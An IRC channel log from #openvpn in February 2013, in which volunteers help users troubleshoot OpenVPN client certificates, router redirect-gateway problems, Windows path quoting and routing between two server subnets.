18:56 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer]
19:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
19:06 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
19:37 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 245 seconds]
19:38 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn
19:39 -!- raidz is now known as raidz_away
19:42 -!- prometheanfire [~promethea@gentoo/developer/prometheanfire] has left #openvpn []
20:07 -!- Saviq_ [~Saviq@194.168.195.98] has joined #openvpn
20:09 -!- AsadH is now known as zz_AsadH
20:15 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer]
20:21 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
20:53 -!- julius_ [~julius@141.41.92.122] has quit [Ping timeout: 255 seconds]
20:58 -!- oyunokata [~rrinehart@71.21.227.159] has joined #openvpn
21:06 -!- oyunokata [~rrinehart@71.21.227.159] has quit [Quit: oyunokata]
21:47 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 264 seconds]
22:12 -!- adolfomaltez [~taro@190.62.211.253] has quit [Remote host closed the connection]
22:28 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn
23:50 -!- Devastator- [~devas@186.214.111.148] has joined #openvpn
23:51 -!- Devastator- [~devas@186.214.111.148] has quit [Changing host]
23:51 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn
23:51 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 252 seconds]
--- Day changed Sat Feb 02 2013
00:48 -!- Saviq_ [~Saviq@194.168.195.98] has quit [Ping timeout: 248 seconds]
01:04 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
01:14 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn
01:29 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
01:40 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Ping timeout: 276 seconds]
01:43 -!- Porkepix [~Porkepix@157.138.76.100] has joined #openvpn
02:07 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit []
02:21 -!- Porkepix [~Porkepix@157.138.76.100] has quit [Ping timeout: 255 seconds]
02:24 -!- Porkepix [~Porkepix@79.31.185.239] has joined #openvpn
02:35 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has left #openvpn ["Once you know what it is you want to be true, instinct is a very useful device for enabling you to know that it is"]
03:48 -!- bauruine [~stefan@91.236.116.112] has quit [Read error: Connection reset by peer]
03:52 -!- Devastator- is now known as Devastator
04:00 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn
04:02 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 240 seconds]
04:03 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
04:05 -!- dazo_afk is now known as dazo
04:05 -!- Devastator [~devas@177.18.198.246] has joined #openvpn
04:12 -!- _b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
04:16 -!- _b00b is now known as b00b
04:16 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds]
04:17 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn
04:20 -!- Devastator [~devas@177.18.198.246] has quit [Changing host]
04:20 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
04:26 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
04:39 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has quit [Ping timeout: 260 seconds]
04:50 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
04:52 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 256 seconds]
04:53 -!- Cpot-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
04:55 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
04:57 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 245 seconds]
04:57 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
04:58 -!- Cpot-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 244 seconds]
05:02 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
05:03 < hg_5> hello
05:07 -!- brute11k1 [~brute11k@89.249.231.86] has quit [Ping timeout: 255 seconds]
05:14 -!- brute11k [~brute11k@89.249.231.86] has joined #openvpn
05:21 -!- `Ile` [~ile@109-92-65-39.dynamic.isp.telekom.rs] has joined #openvpn
05:35 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Quit: leaving]
05:39 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
06:07 -!- julius_ [~julius@141.41.92.122] has joined #openvpn
06:22 -!- `Ile` [~ile@109-92-65-39.dynamic.isp.telekom.rs] has quit [Quit: Lost terminal]
06:23 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 246 seconds]
06:26 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
06:46 -!- dazo is now known as dazo_afk
06:53 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
06:55 -!- JackWinter [~jack@vodsl-4655.vo.lu] has left #openvpn ["Konversation terminated!"]
07:02 -!- master_of_master [~master_of@p57B52C3E.dip.t-dialin.net] has quit [Ping timeout: 264 seconds]
07:02 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn
07:02 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
07:03 -!- master_of_master [~master_of@p57B5233B.dip.t-dialin.net] has joined #openvpn
07:17 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
07:26 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds]
07:30 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
07:45 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
07:54 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
07:55 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Client Quit]
08:03 -!- b1rkh0ff [~b1rkh0ff@178.77.20.138] has quit [Read error: Operation timed out]
08:03 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 256 seconds]
08:04 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
08:08 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
08:11 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn
08:15 < hg_5> hello
08:17 -!- b1rkh0ff [~b1rkh0ff@178.77.15.65] has joined #openvpn
08:20 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has quit [Ping timeout: 264 seconds]
08:22 -!- mattock is now known as mattock_afk
08:24 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn
08:26 < kisom> Is it possible to connect to a server on iOS without a client certificate?
08:27 < kisom> OpenVPN seems to require a client certificate to be selected...
08:27 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
08:30 -!- mode/#openvpn [+v pekster] by ChanServ
08:31 <+pekster> kisom: It's possible for a client to omit sending a certificate, yes (by omitting the --cert and --key options) but this is only valid if the server does not require them from clients (ie: --client-cert-not-required)
08:32 <+pekster> I haven't used the iOS GUI, but I assume you can also feed it a standard config file with the options/features you need?
08:32 <+pekster> (if the UI really doesn't support that)
08:33 < kisom> Yes, I imported a random certificate and private key that are signed by another CA, and not it works.
08:33 < kisom> s/not/now 08:34 <+pekster> Be aware that may be sent over the wire anyway (even if the server ignores it) so you are leaking any info that's encoded in the X509 file to anyone who can see your traffic. This may or may not be relevant 08:35 < kisom> It's not relevant in this case :) 08:35 <+pekster> I've got a nice write-up in the works explaining leakage and side-channel attacks (I call it a "social side-channel") by (ab)using this info :) 08:35 < kisom> My full name and email address is in the server certificate anyways 08:36 <+pekster> Yea, basically that. Companies sometimes include department, org name, etc. All useful if you're going to target someone to talk them into helping your compromise the infrastructure 08:36 <+pekster> Basically an adaptation of social engineering for the plaintext data you can swipe 08:37 < kisom> I gotta say the iOS client works very well 08:37 < kisom> Way better than the cisco client 08:38 * pekster has never been a fan of Cisco 08:38 < kisom> Well my company is selling VPN services to a huge company that needs to avoid censor in various countries 08:38 <+pekster> The design reaks of the same "Walled Garden" we've come to love/hate with another Giant Who Must Not Be Nammed 08:39 < kisom> Well I have nothing against cisco 08:39 < kisom> It's just that their client does not auto reconnect 08:39 < kisom> And it works badly behind old home routers 08:39 <+pekster> Heh, I'd say just patch the code, but you can't do that on iOS :P 08:40 <+pekster> Yea, OpenVPN certainly scores points for flexibility 08:40 < kisom> Well either way, it's time to get coding to have iOS support for our solution 08:58 < hg_5> hello, i have problem with openvpn ,can you look at this post http://www.gargoyle-router.com/phpbb/viewtopic.php?f=11&t=3802&p=16842#p16842 08:58 <@vpnHelper> Title: Gargoyle Forum View topic - openvpn client - doesnt redirect ip (at www.gargoyle-router.com) 09:04 <+pekster> How are you testing the external source IP? 
Also, are the 2 rfc1918 networks on a related backend, that is are they connected to each other locally, or are the on completely separate ISPs? 09:07 -!- mattock_afk is now known as mattock 09:08 < hg_5> im connecting with tl-wr1043nd and go on www.whatismyip.com 09:08 < hg_5> separate ISP 09:08 < hg_5> mifi router 3g has its own ISP and tomato openvpn server router has its own ISP 09:10 <+pekster> Server config, client logs (verb 4 please) and a copy of the client's routing table post-connection would be useful 09:10 <+pekster> Ideally in 'ip route' syntax, but 'route' or 'ifconfig' is acceptable if you lack modern-ish Linux tools (and upstream should be scolded for that) 09:13 < hg_5> tomato router server config: http://puu.sh/1WkLh http://puu.sh/1WkLP 09:14 < hg_5> can you tell what to type in router(through ssh) to get another informations ? 09:15 <+pekster> Ugh, stupid GUI frontends. No promisses on how accurate this is without raw configs, but since your other client works it's probably something client-side 09:15 <+pekster> !logs 09:15 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 09:15 <+pekster> No idea where your special box keeps logs. Usually syslog is common for daemons, except when otherwise redirected 09:16 <+pekster> '/sbin/ip route show' is usually sufficient to dump routing, if you have correct iproute2 support 09:16 < hg_5> you mean where tl-wr1043nd keeps logs? 09:16 <+pekster> Otherwise, 'route -n' is probably sufficient 09:17 <+pekster> Yes. 
I want client logs to see if something failed to happen that was supposed to
09:17 -!- mattock is now known as mattock_afk
09:17 <+pekster> Checking your logs is a pretty basic level of troubleshooting you should already do before asking for help. Errors or warnings in the log is how openvpn tells you something is wrong, so it's pretty critical you look there
09:18 <+pekster> Most problems require inspecting these logs to confirm a problem, or confirm a lack of one
09:18 < hg_5> pekster http://puu.sh/1WkSJ
09:18 < hg_5> sorry, im not too much familiar with linux commands
09:19 < rob0> pekster, please lmk when your "social side-channel" write-up is ready.
09:19 <+pekster> routing table looks good; it's taking the --redirect-gateway push from the server, so traffic should be going out via tun0 to your VPN peer
09:20 <+pekster> rob0: Will-do. I'm probably going to put it under GFDL or similar. You planning to mirror it, or just want to read/link/reference it?
09:20 < rob0> read, maybe comment
09:21 <+pekster> hg_5: If you do a ping to say 4.2.2.1 (or some public host) and tcpdump traffic, can you see it going over tun0 instead of br-lan? (if that thing lacks tcpdump, you can do a 'poor mans tcpdump' with some iptables rules, like 'iptables -t mangle -A POSTROUTING -o tun0 -d 4.2.2.1' and check the hitcount as you ping that IP
09:22 <+pekster> rob0: Sure. I need to prettify an "official" link, but I'll have an unofficial one ready before that. I'll PM you that, although I'd rather limit distribution until I can get context/licensing/etc sorted out for the final version
09:23 < rob0> np, thanks
09:27 -!- mattock_afk is now known as mattock
09:31 < hg_5> pekster what exactly to check, that last command?
09:32 < hg_5> i can't ping 10.9.0.1 neither 192.168.1.1 (those ips are my router tomato)
09:37 <+pekster> Firewall perhaps?
09:38 <+pekster> Could be not properly allowing traffic to flow over tun0 on your client, or the server not accepting pings or input on its tun iface; if your other client can ping the vpn peer (10.9.0.1) then you know your issue must be firewall on this client
09:49 -!- idlecool [~i@sd.gs] has joined #openvpn
09:49 < idlecool> i am trying to install openvpn server
09:50 < idlecool> the server is not starting, i guess there should be logs somewhere. but unable to find it.
09:50 < idlecool> i am on ubuntu 12.04
09:50 < rob0> !logs
09:50 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
09:50 < rob0> !logfile
09:50 <@vpnHelper> "logfile" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging or (#3) see --daemon --log and --verb in the manual (!man) for more info
09:56 < idlecool> /var/log/syslog is empty.
09:58 < rob0> If you have deleted your logfile while the syslogd is running, the logs are still being written to the deleted inode. Try restarting your syslogd?
10:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds]
10:03 -!- oneb [~oneb@99-101-240-158.lightspeed.tulsok.sbcglobal.net] has joined #openvpn
10:03 < oneb> any support avail for connecting on windows 8?
10:04 -!- mattock is now known as mattock_afk
10:05 < idlecool> rob0: got it.
thanks, i was looking for wrong package to install, in ubuntu its sysklogd
10:05 < oneb> !paste
10:05 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use
10:06 < oneb> !configs
10:06 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
10:06 < idlecool> i am not quite sure what this means
10:06 < idlecool> "NOTE: OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables"
10:07 < oneb> I have everything set to run as admin. Windows 8 64-bit. http://pastebin.com/bmVrWwxT is my current log.
10:07 < oneb> I've been using OpenVPN for quite some time now, just now running into problems with win8.
10:07 <+pekster> idlecool: If you use directives that call external scripts (such as --up, --down, --client-connect) you need to set --script-security as required to give it permission to run. See further details in the manpage under --script-security
10:08 < rob0> it is a NOTE, not an error
10:10 <+pekster> oneb: I'm guessing a problem with absolute/relative paths, so verify --cd lines, and when in doubt try it with absolute paths first. It could be weirdness with filesystem views if Win8 does what Vista pre-SP1 did by letting non-admin users (or admins when not engaging UAC) store files in "common" areas and put it in a user overlay transparently
10:10 <+pekster> UAC is worse than SELinux since it won't even tell you it's doing some of this voodoo
10:11 < oneb> I've disabled UAC and factory firewall. Running all .exe's as admin.
10:12 <+pekster> Try absolute paths?
--ca "C:\\program files\\openvpn\\config\\keys\\ca.crt" (or whatever the relevant path is?)
10:12 <+pekster> Windows may play nice with the forward-slash syntax, although I haven't tried that. It likes backslashes natively, and you must escape them, and then quote names with spaces in addition
10:15 -!- oneb [~oneb@99-101-240-158.lightspeed.tulsok.sbcglobal.net] has quit []
10:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
10:34 -!- dazo_afk is now known as dazo
10:34 -!- novaflash is now known as novaflash_away
10:49 -!- novaflash_away is now known as novaflash
10:50 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 252 seconds]
10:59 -!- dazo is now known as dazo_afk
11:02 <@krzee> !winpath
11:02 <@vpnHelper> "winpath" is (#1) Remember on Windows to quote pathnames and use double backslashes, e.g.: "C:\\Program Files\\OpenVPN\\config\\foo.key" or (#2) also, you can use forward slashes to avoid needing double backslashes, but you still need quotes, e.g.: C:/Program Files/OpenVPN/config/foo.key (but surrounded by quotes)
11:02 <@krzee> it does work with forward slashes, but still must quote
11:03 -!- spitf1r3 [~quassel@89.200.144.70] has quit [Ping timeout: 248 seconds]
11:03 <+pekster> That just looks screwy :P
11:04 -!- piele [~Unknown@bakzeil.creativeserver.net] has joined #openvpn
11:04 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat]
11:05 -!- wh1p_ [~wh1p@host-2-100-148-6.as13285.net] has joined #openvpn
11:05 < wh1p_> test?
11:06 <@krzee> srs?
11:06 -!- wh1p_ [~wh1p@host-2-100-148-6.as13285.net] has quit [Client Quit]
11:09 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Quit: Bye]
11:09 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Ping timeout: 248 seconds]
11:22 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Read error: Operation timed out]
11:25 -!- dmz [~dmz@unaffiliated/dmz] has quit [Quit: Ex-Chat]
11:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
11:32 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn
11:34 -!- rob0 [rob0@harrier.slackbuilds.org] has joined #openvpn
11:34 -!- rob0 [rob0@harrier.slackbuilds.org] has quit [Changing host]
11:34 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn
11:40 -!- brute11k1 [~brute11k@89.249.231.17] has joined #openvpn
11:41 -!- brute11k [~brute11k@89.249.231.86] has quit [Ping timeout: 260 seconds]
12:06 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 276 seconds]
12:19 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has joined #openvpn
12:32 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
12:38 -!- mndo [~mndo@bl15-208-101.dsl.telepac.pt] has joined #openvpn
12:44 <+EugeneKay> srs.
12:46 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
12:46 < Maverick0984> anyone have an implementation of OpenVPN that uses PhoneFactor?
12:49 -!- spitf1r3 [~quassel@89.200.144.70] has joined #openvpn
12:49 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
12:59 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat]
13:03 -!- bjh4 [~bjh4@67.87.105.111] has joined #openvpn
13:05 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving]
13:09 -!- MeanderingCode [~Meanderin@173-12-200-221-Albuquerque.hfc.comcastbusiness.net] has joined #openvpn
13:28 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
13:35 -!- mndo [~mndo@bl15-208-101.dsl.telepac.pt] has quit [Ping timeout: 248 seconds]
13:35 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
13:45 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
13:59 -!- 45PABRYG3 [~grey@cpe-76-171-192-216.socal.res.rr.com] has quit [Read error: Connection reset by peer]
14:13 -!- mythos [~mythos@unaffiliated/mythos] has joined #openvpn
14:15 < mythos> hello there. i'm used to create client certificates with "source ./vars && ./build-key ". but the crt-file is now an empty. i'm using a debian 7 with openvpn 2.2.8. any suggestions?
14:15 < mythos> s/an//
14:50 -!- brute11k1 [~brute11k@89.249.231.17] has quit [Quit: Leaving.]
14:57 < hg_5> client1.crt is empty?
14:57 < hg_5> mythos
14:58 < hg_5> pastebin your vars.bat configuration
15:05 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has quit [Ping timeout: 256 seconds]
15:06 <@krzee> i suggest using a real version of openvpn
15:06 <@krzee> :D
15:08 <@krzee> seeing as 2.2.8 has never, and hopefully will never exist
15:08 <@krzee> (that would be a whole lot of new bugs found in 2.2.2)
15:11 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
15:12 <+EugeneKay> I like how this is going
15:13 <@krzee> Maverick0984, whats phonefactor?
15:13 <@krzee> EugeneKay, how whats going?
15:13 <+EugeneKay> The bullshit-o-meter.
15:16 <@krzee> =]
15:19 < hg_5> hm i still have problem with router tl-wr1043nd it can't redirect ip when connected to tomato router with open vpn server
15:19 < hg_5> ....
15:20 <@krzee> !logs
15:20 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
15:20 <@krzee> !configs
15:20 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
15:20 <@krzee> @ hg_5 ^
15:21 -!- valparaiso [~valparais@pdpc/supporter/student/valparaiso] has joined #openvpn
15:22 < hg_5> tomato 1: http://puu.sh/1Wu43, tomato 2: http://puu.sh/1Wu4z , tl-wr1043nd client config: http://pastebin.com/76Drczwj
15:22 <@krzee> oh hell no
15:22 <@vpnHelper> Title: puush / home (at puu.sh)
15:23 <@krzee> dunno what those images are, but:
15:23 <@krzee> !router
15:23 <@vpnHelper> "router" is if you are using one of those hacked up linksys linux routers, and you are not logging...
dont expect help until you turn on logging so you can post them
15:23 <@krzee> goes for configs too
15:23 <@krzee> of course if someone else wants to deal with it, thats fine
15:23 -!- Cpot-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
15:23 <@krzee> me, i only support openvpn, and openvpn has no gui
15:24 <@krzee> in your client config, lines 7 and 17 are the same thing
15:24 <@krzee> ill check back for server config and logs
15:26 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 276 seconds]
15:26 -!- tttttuouuo [~valparais@ARennes-257-1-165-203.w2-10.abo.wanadoo.fr] has joined #openvpn
15:27 -!- tttttuouuo [~valparais@ARennes-257-1-165-203.w2-10.abo.wanadoo.fr] has quit [Client Quit]
15:28 -!- valparaiso [~valparais@pdpc/supporter/student/valparaiso] has quit [Quit: valparaiso]
15:29 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
15:33 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
15:35 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
15:36 < mythos> hg_5, oh, you are right. the version is 2.2.1-8
15:37 < mythos> and ./pkitool did the job
15:37 < mythos> i don't know, why the script fails, when --interactive is used
15:39 < hg_5> yeah krzee sorry :D:D
15:40 < hg_5> krzee here is my server config of router's with tomato http://pastebin.com/hwJMx9Pr
15:44 <@krzee> 2 of 4, keep going =]
15:45 <@krzee> oh and i see your comp-lzo doesnt match exactly, make them identical even if it works currently
15:46 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
15:46 <@krzee> also, if theres ccd entries, they are needed
15:46 <@krzee> and remember to raise verb before gathering the logs
15:54 -!- MeanderingCode [~Meanderin@173-12-200-221-Albuquerque.hfc.comcastbusiness.net] has quit [Read error: Connection reset by peer]
15:59 < hg_5> krzee what 2 more? what logs exactly?
16:01 < hg_5> krzee so what exactly is needed, paste this: "client-config-dir ccd" into client config on tl-wr1043nd ?
16:02 < tabakhase> is openvpn the right tool to connect 2 networks? say 2 hosts, both connected to a vLAN & by internet and i want to create a bridge that "all hosts in the vlans can use without any bigger configuration overhead on the clients"
16:04 -!- eugenmayer [~EugenMaye@HSI-KBW-109-193-196-063.hsi7.kabel-badenwuerttemberg.de] has joined #openvpn
16:05 < eugenmayer> hello, iam trying to setup a UDP and TCP server to route into the same network. UDP/TCP both run on port 10002, UDP is 10.77.0.0/24 .. TCP is 10.77.1.0/24 … basically iam doing this
16:05 < eugenmayer> http://pastie.org/6031230
16:05 < hg_5> krzee its also from firewall on tomato's router http://pastebin.com/4gqaMbMq
16:06 < eugenmayer> now i can ping 10.77.0.1 from a client connected to 10.77.1.0 .. but i cannot access any client. for both networks client-to-client is allowed
16:07 < eugenmayer> iam currently reading docs at http://openvpn.net/index.php/open-source/downloads.html .. but i seem to have made a mistake. Can someone give me a hint?
16:07 <@vpnHelper> Title: Community Downloads (at openvpn.net)
16:07 < eugenmayer> sorry...https://community.openvpn.net/openvpn/wiki/BridgingAndRouting
16:07 <@krzee> hg_5, this:
16:07 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net)
16:07 <@krzee> !logs
16:07 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
16:07 <@krzee> hg_5, no do not put ccd on the client, do you know what ccd is?
16:12 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has quit [Ping timeout: 276 seconds]
16:14 < eugenmayer> i added a traceroute : http://pastie.org/6031252
16:17 <@krzee> eugenmayer,
16:17 <@krzee> !route
16:17 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
16:17 <@krzee> once you understand that well enough, the rest is easy
16:18 * eugenmayer reading
16:18 <@krzee> you've read it a few times before havnt ya?
16:18 <@krzee> i know i remember ya, dont remember if you did routing before tho ;]
16:19 < eugenmayer> well iam trying to fiddle my way through without going on the nerves of the people in this channel. Well but i think i fail on that last point :)
16:19 <@krzee> does 10.77.0.x have a route to 10.77.1.0?
16:20 <@krzee> *shrug* i cant remember you being on my nerves before
16:21 < hg_5> krzee http://pastebin.com/SAh8Q9ML
16:21 <@krzee> eugenmayer, you may also want more permissive forward rules during testing
16:22 <@krzee> just blindly allow all forward traffic from any tun interface til you get it working
16:22 <@krzee> THEN tune your firewall
16:22 < eugenmayer> krzee: FW is off for now
16:23 <@krzee> thats not good either
16:23 < eugenmayer> well yes the client (10.77.1.2) has this route: http://screencast.com/t/AUjQLbdL22Pb
16:23 <@vpnHelper> Title: 2013-02-02_2322 - EugenMayer's library (at screencast.com)
16:23 <@krzee> unless by off you mean set to allow everything
16:23 < eugenmayer> off means : http://pastie.org/6031297
16:24 <@krzee> cool
16:24 <@krzee> and i dunno what that gui is, but i know its not openvpn
16:24 < eugenmayer> well the backend is openvpn, just a OSX gui for that
16:25 <@krzee> config in openvpn for now, then move on to whatever gui you want later
16:25 < eugenmayer> i know, thats not the best case. If you want me to do that, i can just use a debian client, no issues
16:25 < eugenmayer> krzee: thats "osx"..well.. :)
16:25 <@krzee> on the server that uses 10.77.0.1 you want push "route 10.77.1.0 255.255.255.0"
16:25 <@krzee> and vice versa
16:26 <@krzee> and i use osx, i have NEVER used some gui to configure openvpn
16:26 <@krzee> so its not osx
16:26 <@krzee> its the user ;]
16:26 -!- Cpot-Oblivious is now known as Cpt-Oblivious
16:27 < eugenmayer> krzee: well ok, i did the route on the 10.77.1.0 side, but not the other side.
*shrug*
16:27 <@krzee> no route back = no communication
16:27 < eugenmayer> so basically
16:27 < eugenmayer> server 10.77.1.0 255.255.255.0
16:27 < eugenmayer> push "route 10.77.0.0 255.255.255.0"
16:27 < eugenmayer> —
16:27 < eugenmayer> on the one side
16:27 <@krzee> yep
16:28 < eugenmayer> server 10.77.0.0 255.255.255.0
16:28 < eugenmayer> push "route 10.77.1.0 255.255.255.0"
16:28 < eugenmayer> --
16:28 <@krzee> yep
16:28 < eugenmayer> on the other, right? ok, testing
16:28 <@krzee> and of course you need ip forwarding on in the OS as well
16:28 <@krzee> (not just the firewall)
16:28 < eugenmayer> krzee: you mean on the server i guess ( is on )
16:29 < eugenmayer> vpn :: /etc/openvpn » sysctl -w net.ipv4.ip_forward=1
16:29 < eugenmayer> net.ipv4.ip_forward = 1
16:29 <@krzee> yes the server
16:29 <@krzee> !ipforward
